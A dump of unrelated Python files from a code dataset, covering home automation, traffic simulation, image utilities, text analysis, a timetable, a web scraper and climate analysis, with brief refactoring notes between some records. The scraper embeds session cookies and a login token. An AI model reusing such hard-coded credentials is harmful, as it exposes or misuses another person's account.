Devices[UNIT_PROGRAM_STATE].Update(program_state, str(program_state))\n\n self.prv_program_state = program_state\n except:\n Domoticz.Log(\"An error occurred updating program state\")\n\n def _update_modulation_level(self):\n try:\n modulation_level = self.my_toon.thermostat_info.current_modulation_level\n\n if modulation_level != self.prv_modulation_level:\n if self.print_debug_log:\n Domoticz.Log(\"Update modulation level: \" + str(modulation_level))\n Devices[UNIT_MODULATION_LEVEL].Update(modulation_level, str(modulation_level))\n\n self.prv_modulation_level = modulation_level\n except:\n Domoticz.Log(\"An error occurred updating modulation level\")\n\n @staticmethod\n def get_scene_value(x):\n return {\n 'Unknown': 0,\n 'Away': 10,\n 'Sleep': 20,\n 'Home': 30,\n 'Comfort': 40,\n 'Holiday': 50\n }[x]\n\n @staticmethod\n def get_scene_name(i):\n str_return_string = \"Unknown\"\n\n if i == 10:\n str_return_string = \"Away\"\n elif i == 20:\n str_return_string = \"Sleep\"\n elif i == 30:\n str_return_string = \"Home\"\n elif i == 40:\n str_return_string = \"Comfort\"\n elif i == 50:\n str_return_string = \"Holiday\"\n\n return str_return_string\n\nglobal _plugin\n_plugin = ToonApiLibPlugin()\n\n\ndef onStart():\n global _plugin\n _plugin.on_start()\n\n\ndef onCommand(Unit, Command, Level, Hue):\n global _plugin\n _plugin.on_command(Unit, Command, Level, Hue)\n\n\ndef onHeartbeat():\n global _plugin\n _plugin.on_heartbeat()\n","sub_path":"plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":17216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
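`get_scene_value` and `get_scene_name` above maintain the same scene-to-level mapping twice, once as a dict literal and once as an if/elif chain. A table-driven sketch that keeps the selector levels in one place and derives the reverse lookup:

```python
SCENE_VALUES = {
    "Unknown": 0, "Away": 10, "Sleep": 20,
    "Home": 30, "Comfort": 40, "Holiday": 50,
}
SCENE_NAMES = {level: name for name, level in SCENE_VALUES.items()}

def get_scene_name(level):
    # "Unknown" doubles as the fallback, matching the if/elif chain above
    return SCENE_NAMES.get(level, "Unknown")

assert get_scene_name(30) == "Home"
assert get_scene_name(99) == "Unknown"
assert all(get_scene_name(level) == name for name, level in SCENE_VALUES.items())
```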
+{"seq_id":"76045761","text":"import os\r\nimport sys\r\nimport InitSetUp \r\nimport OutputManager\r\n\r\nimport datetime\r\nimport timeit\r\nimport time\r\n\r\nfrom Driver import Driver\r\nimport EvolutionaryLearner\r\n\r\n\r\n# Importing needed python modules from the $SUMO_HOME/tools directory\r\nif 'SUMO_HOME' in os.environ:\r\n tools = os.path.join(os.environ['SUMO_HOME'], 'share/sumo/tools')\r\n sys.path.append(tools)\r\nelse:\r\n sys.exit(\"please declare environment variable 'SUMO_HOME'\")\r\n\r\n\r\nfrom sumolib import checkBinary # Checks for the binary in environ vars\r\nimport traci\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # --- TRAINING OPTIONS ---\r\n gui = False\r\n totalGenerations = 50\r\n individualRunsPerGen = 3 # Min number of training runs an individual gets per generation\r\n # ----------------------\r\n \r\n # --- USER-DEFINED RULES TOGGLE ---\r\n maxGreenAndYellowPhaseTime_UDRule = True\r\n maxRedPhaseTime_UDRule = False\r\n assignGreenPhaseToSingleWaitingPhase_UDRule = True\r\n # ----------------------\r\n\r\n # Attributes of the simulation\r\n sumoNetworkName = \"simpleNetwork.net.xml\"\r\n maxGreenPhaseTime = 225\r\n maxYellowPhaseTime = 5\r\n maxSimulationTime = 10000\r\n runTimeSet = []\r\n\r\n\r\n # setting the cmd mode or the visual mode\r\n if gui == False:\r\n sumoBinary = checkBinary('sumo')\r\n else:\r\n sumoBinary = checkBinary('sumo-gui')\r\n\r\n # initializations\r\n #sumoCmd = [sumoBinary, \"-c\", \"intersection/tlcs_config_train.sumocfg\", \"--no-step-log\", \"true\", \"--waiting-time-memory\", str(max_steps)]\r\n sumoCmd = [sumoBinary, \"-c\", \"config_file.sumocfg\", \"--waiting-time-memory\", \"5\", \"--time-to-teleport\", \"-1\"]\r\n \r\n print(\"----- Start time:\", datetime.datetime.now())\r\n setUpTuple = InitSetUp.run(sumoNetworkName, individualRunsPerGen)\r\n simRunner = Driver(sumoCmd, setUpTuple, maxGreenPhaseTime, maxYellowPhaseTime, maxSimulationTime, maxGreenAndYellowPhaseTime_UDRule, maxRedPhaseTime_UDRule, assignGreenPhaseToSingleWaitingPhase_UDRule)\r\n episode = 0\r\n generations = 1\r\n allIndividualsTested = False\r\n simulationStartTime = datetime.datetime.now()\r\n generationRuntimes = []\r\n\r\n # Evolutionary learning loop \r\n while generations <= totalGenerations:\r\n print('----- GENERATION {} of {}'.format(generations, totalGenerations))\r\n print(\"This simulation began at:\", simulationStartTime)\r\n print(\"The average generation runtime is\", sum(generationRuntimes)/generations)\r\n genStart = datetime.datetime.now()\r\n startTime = time.time()\r\n\r\n # Prepare for next simulation run\r\n allIndividualsTested = False\r\n for ap in setUpTuple[2]:\r\n for i in ap.getIndividualsSet():\r\n i.resetSelectedCount()\r\n # print(\"Generation includes Individual:\", i.getID())\r\n\r\n # Reinforcement learning loop\r\n while not allIndividualsTested:\r\n # Adjust maximum simulation times for individuals based on generation count\r\n if generations >= 5 and generations < 15:\r\n print('The generation is', generations, \"so we're changing maxSimTime to 6000\")\r\n maxSimulationTime = 6000\r\n print(\"Changed maxSimTime to\", maxSimulationTime)\r\n elif generations >= 15:\r\n print('The generation is', generations, \"so we're changing maxSimTime to 4000\")\r\n maxSimulationTime = 4000\r\n print(\"Changed maxSimTime to\", maxSimulationTime)\r\n\r\n print('Changes made. 
The generation is', generations, \"and the maxSimTime is\", maxSimulationTime)\r\n simRunner = Driver(sumoCmd, setUpTuple, maxGreenPhaseTime, maxYellowPhaseTime, maxSimulationTime, maxGreenAndYellowPhaseTime_UDRule, maxRedPhaseTime_UDRule, assignGreenPhaseToSingleWaitingPhase_UDRule)\r\n\r\n print('----- Episode {}'.format(episode+1), \"of GENERATION {} of {}\".format(generations, totalGenerations))\r\n print(\"Generation start time:\", genStart)\r\n print(\"The average generation runtime is\", sum(generationRuntimes)/generations)\r\n start = timeit.default_timer()\r\n resultingAgentPools = simRunner.run() # run the simulation\r\n stop = timeit.default_timer()\r\n print('Time: ', round(stop - start, 1))\r\n episode += 1\r\n\r\n needsTesting = []\r\n for ap in resultingAgentPools:\r\n for i in ap.getIndividualsSet():\r\n if i.getSelectedCount() < individualRunsPerGen:\r\n needsTesting.append(True)\r\n else:\r\n needsTesting.append(False)\r\n \r\n if True not in needsTesting:\r\n allIndividualsTested = True\r\n for ap in resultingAgentPools:\r\n for i in ap.getIndividualsSet():\r\n continue # print(i, \"has a selected count of:\", i.getSelectedCount())\r\n #allIndividualsTested = True # Uncomment for quick testing\r\n\r\n # Prepare individuals for the next run through\r\n for ap in setUpTuple[2]:\r\n ap.normalizeIndividualsFitnesses() # Normalize the fitness values of each Individual in an agent pool for breeding purposes\r\n \r\n if generations + 1 < totalGenerations:\r\n EvolutionaryLearner.createNewGeneration(setUpTuple[2]) # Update agent pools with a new generation of individuals\r\n for ap in setUpTuple[2]:\r\n for i in ap.getIndividualsSet():\r\n i.resetSelectedCount()\r\n i.resetAggregateVehicleWaitTime()\r\n # print(\"Generation includes Individual:\", i.getID(), \";\\n\")\r\n sys.stdout.flush()\r\n else:\r\n OutputManager.run(setUpTuple[2], sum(generationRuntimes)/50, (sum(generationRuntimes)/50)*50)\r\n print(\"Output file created.\")\r\n \r\n # bestIndividuals = []\r\n # for ap in setUpTuple[2]:\r\n # bestIndividuals.append(ap.getBestIndividual())\r\n \r\n # f = open(\"bestIndividuals.txt\", \"w\")\r\n \r\n # for i in bestIndividuals:\r\n # f.write(\"The best individual in Agent Pool\", i.getAgentPool().getID(), \"is\", i.getID(), \"comprised of conditions:\", i.getConditions(), \"and action:\", i.getAction(), \"\\n\\n\")\r\n \r\n print(\"Generation start time:\", genStart, \"----- End time:\", datetime.datetime.now())\r\n generationRuntimes.append(time.time() - startTime)\r\n generations += 1 \r\n \r\n\r\n print(\"Start time:\", simulationStartTime, \"----- End time:\", datetime.datetime.now())\r\n print(\"This simulation began at:\", simulationStartTime)\r\n print(\"PATH:\", path)\r\n # Do something to save session stats here\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
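The reinforcement-learning loop above re-derives `maxSimulationTime` from the generation count with an if/elif chain on every episode, and the final `print("PATH:", path)` refers to a name the script never defines. Pulling the schedule into a pure function makes the thresholds testable; the caps below mirror the hard-coded values:

```python
def max_sim_time_for(generation):
    """Per-generation simulation cap: 10000 steps before generation 5,
    6000 from generation 5, 4000 from generation 15."""
    if generation >= 15:
        return 4000
    if generation >= 5:
        return 6000
    return 10000

assert max_sim_time_for(1) == 10000
assert max_sim_time_for(7) == 6000
assert max_sim_time_for(20) == 4000
```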
+{"seq_id":"238708782","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n__all__ = ['display', 'plot', 'read_img', 'load', 'read', 'write_img', 'save', 'write',\n 'get_width_and_height', 'dimensions', 'get_height', 'height',\n 'get_width', 'width', 'bgr_2_grayscale', 'to_uint8', 'stack_3',\n 'get_depth', 'grayscale_2_bgr', 'Displayer', 'mean']\n\n\nclass Displayer:\n def __init__(self, window_name):\n self.window_name = window_name\n cv2.namedWindow(self.window_name, cv2.WINDOW_KEEPRATIO)\n cv2.resizeWindow(self.window_name, 1280, 720)\n\n def update_im(self, im):\n cv2.imshow(self.window_name, im)\n if cv2.waitKey(100) & 0xFF == ord('q'):\n pass\n\n\ndef mean(ims):\n im = np.stack(ims, axis=len(np.shape(ims[0])))\n im = np.float32(im)\n im = np.mean(im, axis=len(np.shape(ims[0])))\n return np.uint8(im)\n\ndef display(image, title=''):\n \"\"\"Uses cv2 to display an image then wait for a button press\"\"\"\n\n cv2.namedWindow(title, cv2.WINDOW_KEEPRATIO)\n cv2.resizeWindow(title, 960, 540)\n cv2.imshow(title, image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\ndef plot(im):\n plt.figure()\n plt.imshow(im)\n plt.show()\n\ndef to_uint8(im):\n im = (im - np.min(im))/(np.max(im)-np.min(im)) * 255\n return np.uint8(im)\n\ndef read_img(filepath, flag=1):\n \"\"\"\n Reads an image from a filepath.\n\n The image should be in the working directory or a full path of image\n should be given.\n\n Parameters\n ----------\n filepath: filepath of the image\n\n flag: Specifies how the image is read\n 1: Loads a color image. Any transparency will be neglected.\n 0: Loads image in grayscale mode.\n -1: Loads image including alpha channel\n\n Returns\n -------\n img: output image\n Number of channels will be determined by the chosen flag.\n Equal to None if filepath does not exist\n Color images will have channels stored in BGR order\n\n \"\"\"\n img = cv2.imread(filepath, flag)\n return img\n\n\nload = read_img\nread = read_img\n\n\ndef write_img(img, filename):\n \"\"\"\n Saves an image to a specified file.\n\n The image format is chosen based on the filename extension\n\n Parameters\n ----------\n img: Image to be saved\n\n filename: Name of the file\n\n Notes\n -----\n Only 8-bit single channel or 3-channel (BGR order) can be saved. If\n the format, depth or channel order is different convert it first.\n\n It is possible to store PNG images with an alpha channel using this\n function. To do this, create 8-bit 4-channel image BGRA, where the alpha\n channel goes last. 
Fully transparent pixels should have alpha set to 0,\n fully opaque pixels should have alpha set to 255\n\n \"\"\"\n cv2.imwrite(filename, img)\n\n\nsave = write_img\nwrite = write_img\n\n\ndef get_width_and_height(img):\n \"\"\"\n Returns width, height for an image\n\n Parameters\n ----------\n img: Array containing an image\n\n Returns\n -------\n width: int\n Width of the image\n height: int\n Height of the image\n\n Notes\n -----\n Width of an image is the first dimension for numpy arrays.\n Height of an image is the first dimension for openCV\n \"\"\"\n width = get_width(img)\n height = get_height(img)\n return width, height\n\n\ndimensions = get_width_and_height\n\n\ndef get_width(img):\n \"\"\"\n Returns width for img\n\n Parameters\n ----------\n img: Array containing an image\n\n Returns\n -------\n width: int\n Width of the image\n\n \"\"\"\n return int(np.shape(img)[1])\n\n\nwidth = get_width\n\n\ndef get_height(img):\n \"\"\"\n Returns the height of an image\n\n Parameters\n ----------\n img: Array containing an image\n\n Returns\n -------\n height: int\n height of the image\n\n \"\"\"\n return int(np.shape(img)[0])\n\n\nheight = get_height\n\n\ndef bgr_2_grayscale(img):\n \"\"\"Converts a BGR image to grayscale\"\"\"\n sz = np.shape(img)\n if np.shape(sz)[0] == 3:\n return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n if np.shape(sz)[0] == 2:\n print('Image is already grayscale')\n return img\n\n\ndef stack_3(img):\n \"\"\"Stacks a grayscale image to 3 depths so that coloured objects\n can be drawn on top\"\"\"\n im = np.dstack((img, img, img))\n return im\n\n\ndef grayscale_2_bgr(img):\n if len(np.shape(img)) == 3:\n print('Image is already 3 channels')\n return img\n else:\n return cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n\n\ndef get_depth(img):\n shp = np.shape(img)\n if len(shp) == 2:\n return 1\n else:\n return shp[2]\n","sub_path":"images/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
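In basics.py above, mean() stacks N same-shaped images along a new trailing axis, averages in float32, and converts back to uint8. The same flow on two tiny synthetic grayscale frames (numpy only, no OpenCV needed; the arrays are made-up sample data):

    import numpy as np

    a = np.zeros((2, 2), dtype=np.uint8)
    b = np.full((2, 2), 100, dtype=np.uint8)
    stacked = np.stack([a, b], axis=a.ndim)         # new last axis, shape (2, 2, 2)
    avg = np.mean(np.float32(stacked), axis=a.ndim)
    print(np.uint8(avg))                            # every pixel averages to 50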
+{"seq_id":"445721859","text":"alphabet = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"]\n\ntobesolved = \"\"\"g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc\ndmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle.\nsqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj.\"\"\"\n\nans = \"\"\n\nfor i in range (0, len(tobesolved)):\n x = tobesolved[i]\n #could use .isalpha() returns True or False\n if x != \" \" and x != \".\" and x != \"(\" and x != \")\" and x != \"'\" and x != \"\\n\":\n y = alphabet.index(x)\n if y+2 > 25:\n y = y - 26\n ans = ans + alphabet[y+2]\n else:\n ans = ans + x\n i += 1\nprint(ans)\n","sub_path":"Old Python/Python_Challenge/pc1.py","file_name":"pc1.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"643048432","text":"from sodatamining.DBConnection import DBConnection\n\n\nclass PostEvolution:\n \n def __init__(self):\n self.debug = False\n self.dbc = DBConnection()\n \n # creates the two tables that hold the differences from one version to another\n #self.dbc.create_evolution_tables()\n \n # calculates and writes the evolutionary steps of the \n # post blocks into postblockevolution \n #self.postblock_evolution()\n \n # calculates and writes the evolutionary steps of \n # post history into posthistoryevolution \n #self.posthistory_evolution()\n \n def postblock_evolution(self):\n counter = 0\n # gets the id's of all entries of the table\n post_block_ids = self.dbc.get_ids_from_postblockversion()\n \n for id_ in post_block_ids:\n # block contains: posthistoryid, postblockid, predpostblockid, \n # flesch_reading_ease, gunning fog index, neg, neu, pos, compound \n block = self.dbc.get_postblock_value(id_[0])\n predBlock = self.dbc.get_postblock_value(block[2])\n \n if predBlock != None:\n self.evaluate_evolution('postblockevolution', block, predBlock)\n #else: \n #print str(id_) + ' has no predecessor!'\n \n counter += 1\n if ((counter % 10000) == 0):\n print (str(counter) + \" post blocks processed!\")\n \n def posthistory_evolution(self):\n counter = 0\n post_history_ids = self.dbc.get_posthistoryid_from_texttype()\n \n for id_ in post_history_ids: \n # post contains: placeholder, posthistoryid, predposthistoryid, \n # flesch_reading_ease, gunning fog index, neg, neu, pos, compound \n post = self.dbc.get_posthistory_value(id_[0])\n # predPost contains: placeholder, placeholder2, posthistoryid,\n # flesch_reading_ease, gunning fog index, neg, neu, pos, compound \n predPost = self.dbc.get_predposthistory_value(post[2]) \n \n if predPost != None: \n self.evaluate_evolution('posthistoryevolution', post, predPost)\n #else: \n #print str(id_) + ' has no predecessor!'\n \n counter += 1\n if ((counter % 10000) == 0):\n print (str(counter) + \" history posts processed!\")\n \n def evaluate_evolution(self, table, entry, predEntry):\n change_type = ''\n debugString = ''\n \n \"\"\"Flesch-Reading-Ease comparison\"\"\"\n if entry[3] > predEntry[3]:\n # Higher score means easier to read\n change_type = 'readability_flesch_improved'\n elif entry[3] < predEntry[3]:\n change_type = 'readability_flesch_aggravate'\n else:\n change_type = 'readability_flesch_unchanged'\n \n if not self.debug:\n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[3], predEntry[3])\n else: \n debugString += change_type + \"-\"\n \n \"\"\"Gunning_Fox index\"\"\"\n if entry[4] < predEntry[4]:\n # Lower score means easier to read\n change_type = 'readability_fog_improved'\n elif entry[4] > predEntry[4]: \n change_type = 'readability_fog_aggravate'\n else: \n change_type = 'readability_fog_unchanged'\n \n if not self.debug: \n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[4], predEntry[4])\n else: \n debugString += change_type + \"-\"\n \n \"\"\"\n \\\"\"\"Sentiment negative value\\\"\"\"\n if entry[5] < predEntry[5]:\n change_type = 'sentiment_neg_decreased'\n else: \n change_type = 'sentiment_neg_increased'\n \n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[5], predEntry[5])\n \n \\\"\"\"Sentiment neutral value\\\"\"\"\n if entry[6] < predEntry[6]:\n change_type = 'sentiment_neu_decreased'\n else: \n change_type = 'sentiment_neu_increased'\n \n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[6], predEntry[6])\n \n 
\\\"\"\"Sentiment positive value\\\"\"\"\n if entry[7] < predEntry[7]:\n change_type = 'sentiment_pos_decreased'\n else: \n change_type = 'sentiment_pos_increased'\n \n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[7], predEntry[7])\n \"\"\"\n \n \"\"\"Sentiment compound value\"\"\"\n if entry[8] > predEntry[8]:\n change_type = 'sentiment_com_improved'\n elif entry[8] < predEntry[8]: \n change_type = 'sentiment_com_aggravate'\n else: \n change_type = 'sentiment_com_unchanged'\n \n if not self.debug: \n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[8], predEntry[8])\n else: \n debugString += change_type\n return debugString\n \n def insert_evolution_entry(self, table, entry, predEntry, change_type, vnew, vold):\n \n if table == 'postblockevolution':\n values = {\n 'posthistoryid': entry[0],\n 'changetype': change_type,\n 'postblockid': entry[1],\n 'predpostblockid': predEntry[1],\n 'valuenew': vnew,\n 'valueold': vold\n }\n \n if self.debug:\n return values;\n else:\n self.dbc.insert_postblockevolution_entry(values)\n \n elif table == 'posthistoryevolution': \n values = {\n 'changetype': change_type,\n 'posthistoryid': entry[1],\n 'predposthistoryid': predEntry[2],\n 'valuenew': vnew,\n 'valueold': vold\n }\n \n if self.debug:\n return values\n else:\n self.dbc.insert_posthistoryevolution_entry(values)\n \nif __name__ == \"__main__\":\n pE = PostEvolution()","sub_path":"sodatamining/PostEvolution.py","file_name":"PostEvolution.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"27095903","text":"#!/usr/bin/python\nimport time\nimport datetime \n\npirm= ['', '', 'English HL', 'English HL', 'IP', 'Lithuanian SL', 'Lithuanian SL', 'CS SL', 'CS SL' ]\nantr= ['CS SL', 'CS SL', 'Mathematics SL', 'Mathematics SL', 'IP', 'Physics SL', 'Physics SL', 'Economics SL', 'Economics SL' ]\ntrec= ['St. Mess', 'English HL', 'English HL', 'Mathematics HL', 'Mathematics HL', 'IP', 'Religion', 'Physics SL', 'Physics SL' ]\nketv= ['Lithuanian SL', 'Lithuanian SL', 'Economics SL', 'Economics SL', 'IP', 'TOK', 'TOK', 'CS HL', 'CS HL' ]\npenkt= ['Mathematics SL', 'Mathematics SL', 'English HL', 'English HL', '', '', '', '', '']\n\ntime = ['8:00-8:45', '8:55-9:40', '9:50-10:35', '10:40-11:25', '11:30-12:15', '12:25-13:10', '13:20-14:05', '14:15-15:00', '15:05-15:50']\ntime_r = [7*60, 8*60+55, 9*60+50, 10*60+40, 11*60+30, 12*60+25, 13*60+20, 14*60+15, 15*60+5] \n\npirm_kab = ['', '', '408', '408', '', '402', '402', 'B205', 'B205']\nantr_kab = ['B205', 'B205', '107', '107', '', 'B203', 'B203', '509', '509']\ntrec_kab = ['', '408', '408', '107', '107', '', '107', 'B203', 'B203']\nketv_kab = ['406', '406', '511', '511', '', '408', '408', 'B205', 'B205']\npenkt_kab = ['107', '107', '408', '408', '', '', '', '', '']\n\nclass Pamoka(object):\n name = \"\"\n classroom = \"\"\n time = \"\"\n number =\"\"\n\n def __init__(self, name, classroom, time, number):\n self.name = name\n self.classroom = classroom\n self.time = time\n self.number = number\n\ndef make_lesson(name, classroom, time, number):\n Lesson = Pamoka(name, classroom, time, number)\n if checktime() < time_r[number] and checktime() > time_r[number - 1]:\n if Lesson.name != '':\n print(Lesson.name + \" \" + Lesson.classroom + \" \" + Lesson.time)\n \ndef make_lesson_table(name, classroom, time, number):\n Lesson = Pamoka(name, classroom, time, number)\n if Lesson.name != '':\n print(Lesson.name + \" \" + Lesson.classroom + \" \" + Lesson.time)\n\n#check time\ndef checktime():\n deftime = datetime.datetime.now()\n hour = deftime.hour\n minutes = deftime.minute\n time = hour*60+minutes\n return time\n\ndef checkday():\n weekday = datetime.datetime.today().weekday()\n return weekday\n \ndef output(day):\n if day == 0:\n for lesson in range(9):\n make_lesson(pirm[lesson], pirm_kab[lesson], time[lesson], lesson)\n elif day == 1:\n for lesson in range(9):\n make_lesson(antr[lesson], antr_kab[lesson], time[lesson], lesson)\n elif day == 2:\n for lesson in range(9):\n make_lesson(trec[lesson], trec_kab[lesson], time[lesson], lesson)\n elif day == 3:\n for lesson in range(9):\n make_lesson(ketv[lesson], ketv_kab[lesson], time[lesson], lesson)\n elif day == 4:\n for lesson in range(9):\n make_lesson(penkt[lesson], penkt_kab[lesson], time[lesson], lesson)\n\n\ndef output_table(day):\n if day == 0:\n for lesson in range(9):\n make_lesson_table(pirm[lesson], pirm_kab[lesson], time[lesson], lesson)\n elif day == 1:\n for lesson in range(9):\n make_lesson_table(antr[lesson], antr_kab[lesson], time[lesson], lesson)\n elif day == 2:\n for lesson in range(9):\n make_lesson_table(trec[lesson], trec_kab[lesson], time[lesson], lesson)\n elif day == 3:\n for lesson in range(9):\n make_lesson_table(ketv[lesson], ketv_kab[lesson], time[lesson], lesson)\n elif day == 4:\n for lesson in range(9):\n make_lesson_table(penkt[lesson], penkt_kab[lesson], time[lesson], lesson)\n\ndef checklate():\n if checktime() > time_r[8]:\n print(\"HW\")\n elif checktime() >= 0 and checktime() < time_r[0]:\n print(\"HW\")\n\nchecklate()\noutput(checkday()) 
\nprint(\"---\")\noutput_table(checkday())","sub_path":"menu_bar.py","file_name":"menu_bar.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"84970294","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/6/10 17:26\n# @Author : gao\n# @File : 01.py\nimport json\nfrom collections import defaultdict\n\nfrom requests_html import HTMLSession\n\nrequest = HTMLSession()\ncookies = {\n 'PHPSESSID': 'nhs3qvsg0nq1nvnk034ebric80',\n 'Hm_lvt_8bb45b8b013c8d4f9a20752d5e7465e4': '1560127792',\n\n \"_ga\": \"GA1.2.387138892.1560127792\",\n \"_gid\": \"GA1.2.1175112514.1560127792\",\n \"Hm_lpvt_8bb45b8b013c8d4f9a20752d5e7465e4\": \"1560131433\",\n \"_gat_gtag_UA_114322073_1\": \"1\",\n \"KEEP_LOGIN\": \"CxngK%3A05d1a0867a8af870907e0782e548802ca5917e10f29e613518adca5cb91fc9c19b77bee6b36667c5ba71add86faf636ec57bbca67ebbadcb5a13a71d40e20aac9c69c0be68fb56d80a438a07ffbe4dd99e6b1ba7ac4ff2f5646%3A1560102641\",\n\n}\n\n\ndef parse_album(album, info=None):\n if info is None:\n info = defaultdict(dict)\n res = request.get(url=album, cookies=cookies)\n # print(res.text)\n\n imgs = res.html.find('.list-item img')\n descs = res.html.find('.list-item-desc a')\n\n # for x in imgs:\n # print(x.attrs.get('alt'), ' -> ', x.attrs.get('src'))\n # for x in desc:\n # print(x.attrs.get('href'), x.text)\n\n for img in imgs:\n key = img.attrs.get('alt').split('.')[0]\n url = img.attrs.get('src').replace('.md', '')\n\n info[key].update(url=url)\n\n for desc_ in descs:\n key = desc_.attrs.get('href').split('/')[-1]\n desc = desc_.text if len(desc_.text.split('.')) > 1 else desc_.text + '.png'\n\n info[key].update(desc=desc)\n\n if res.html.find('.pagination-next'):\n next_url = res.html.find('.pagination-next')[0].find('a')[0].attrs.get('href')\n if next_url:\n parse_album(next_url, info=info)\n\n return info\n\n\ninfo = parse_album('https://imgchr.com/album/C2pZQ')\njson.dump(info, open('路过图床.json', 'w'))","sub_path":"路过/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"281650651","text":"import xarray as xr\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport dask.array\nimport cartopy.crs as ccrs\nimport matplotlib.colors as colors\nimport datetime as dt\nfrom matplotlib.colors import BoundaryNorm\nimport sys\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport matplotlib.gridspec as gridspec\n\n\n\n################################### General Functions\n################################### General Functions\n################################### General Functions\n################################### General Functions\n################################### General Functions\n################################### General Functions\n################################### General Functions\n\n\n# This function moves the start of the wet season [10, 11, 12] to the next year. This means that\n# this year is just the data for one wet season\n\ndef wet_season_year(data):\n \n # This is the start of the wet_season, wet want to move it to the next year so that the start of the\n # wet season and the end are both in the one year. This makes it easier for calculatins later on \n \n data_start = data.where(data.time.dt.month.isin([12]), drop = True) # The later months of the year\n data_start['time'] = data_start.time + pd.to_timedelta('365day') # moving them forward a year\n \n data_end = data.where(data.time.dt.month.isin([1,2,3]), drop = True) # The end half\n \n total = data_end.combine_first(data_start) # All in one year now :)\n \n return total\n\n\ndef split_into_1to8(datafile, rmm_xr):\n \n \n \n '''~~~~~~~~~~~~~~~~~~ Inactive Phases'''\n rmm_inact_dates = rmm_xr.where(rmm_xr.amplitude < 1, drop = True).time.values\n datafile_inact = datafile.where(datafile.time.isin(rmm_inact_dates), drop = True)\n\n '''~~~~~~~~~~~~~~~~~~ Active Phases\n Summary: Looping through all the different RMM phases; getting the dates fro this phase; finding just the rainfall\n in this phase'''\n single_phase = [] # Storage for later concatinating in xarray\n rmm_act = rmm_xr.where(rmm_xr.amplitude >= 1, drop = True) # Only acitve when RMM > 1\n phases = np.arange(1,9) # 8 phases we are looping through\n for phase in phases:\n rmm_single_dates = rmm_act.where(rmm_act.phase == phase, drop = True).time.values # The dates of this phase\n datafile_single = datafile.where(datafile.time.isin(rmm_single_dates), drop = True) # The datafile data in this phase\n single_phase.append(datafile_single) # Appending\n\n phases = np.append(phases.astype('str'), 'inactive') # The ianctive also needs to be included\n single_phase.append(datafile_inact) \n\n\n # Final File\n datafile_RMM_split = xr.concat(single_phase, pd.Index(phases, name = 'phase'))\n \n \n \n return datafile_RMM_split\n\n\n\ndef resample_phase_to_subphase(data):\n \n enhanced = data.sel(phase = ['4','5','6']).sum(dim = 'phase')\n suppressed = data.sel(phase = ['1','2','8']).sum(dim = 'phase')\n trans = data.sel(phase = ['3','7']).sum(dim = 'phase')\n inact = data.sel(phase = 'inactive').drop('phase')\n \n return xr.concat([enhanced,suppressed, trans, inact], \n pd.Index(['enhanced','suppressed','transition','inactive'], name = 'phase'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n############################ MJO Trends\n############################ MJO Trends\n############################ MJO Trends\n############################ MJO Trends\n\n\n\n'''Counts the number of days in each of the MJO phases for each wet-season. 
This is useful for \nnormalising all of the count trends'''\ndef count_in_rmm_phase(rmm):\n\n rmm_act = rmm.where(rmm.amplitude > 1, drop = True)\n \n phases = np.arange(1,9)\n single_phase = []\n for phase in phases:\n\n # Just the data for this single rmm phase\n rmm_single_phase = rmm_act.where(rmm_act.phase == phase)\n # Resmapling via year, to get the number of days in each phase\n number_per_year = rmm_single_phase.phase.resample(time = 'y').count(dim = 'time')\n # Appending\n single_phase.append(number_per_year.values)\n\n\n\n '''Inactive Phase'''\n rmm_inact = rmm.where(rmm.amplitude <=1 , drop = True)\n number_per_year_inact = rmm_inact.phase.resample(time = 'y').count(dim = 'time')\n\n single_phase.append(number_per_year_inact.values)\n\n titles = np.append(np.array([str(phase) for phase in phases]),['inactive'])\n \n datafile_RMM_split = xr.Dataset({'number':(('phase','year'), single_phase)},\n {'phase':titles,\n 'year': number_per_year.time.dt.year.values\n })\n \n \n \n return datafile_RMM_split\n\n\ndef count_in_rmm_subphase(rmm):\n \n enhanced = [4,5,6]\n suppressed = [1,2,8]\n transition = [3,7]\n\n phase_dict = {'enhanced': enhanced, 'suppressed': suppressed, 'transition': transition}\n single_phase = []\n \n rmm_act = rmm.where(rmm.amplitude > 1, drop = True)\n\n for phase_name, phase_nums in phase_dict.items():\n\n # Just the data for this single rmm phase\n 